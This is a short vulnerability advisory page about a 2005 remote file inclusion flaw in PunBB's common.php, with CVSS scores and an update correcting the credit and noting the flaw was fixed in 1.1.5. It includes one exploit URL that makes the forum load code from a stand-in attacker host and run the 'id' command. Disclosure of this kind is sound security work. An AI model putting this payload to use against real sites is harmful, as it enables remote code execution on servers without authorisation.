Remote File Inclusion in forum PunBB

2005.10.24
Credit: RoDheDoR
Risk: High
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Remote File Inclusion in forum PunBB Date:24/10/2005 Severity: High version: 1.1.2 >> 1.1.5 The bug reside in common.php Exploit : http://www.host.com/forum/include/common.php?pun_root=http://www.host_ev il.com/cmd?&=id Discovery by RoDheDoR L-G-H Team http://www.lezr.com -------------------------------------------------------------------------------------------- UPDATE : 1. The bug is over a year old (see bid 10760). 2. The bug was fixed in 1.1.5, so that version is not vulnerable. 3. It was discovered by Radek Hulan, not "RoDheDoR". 4. The exploit detailed is copied directly from the old bid so "RoDheDoR" was obviously aware of it.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top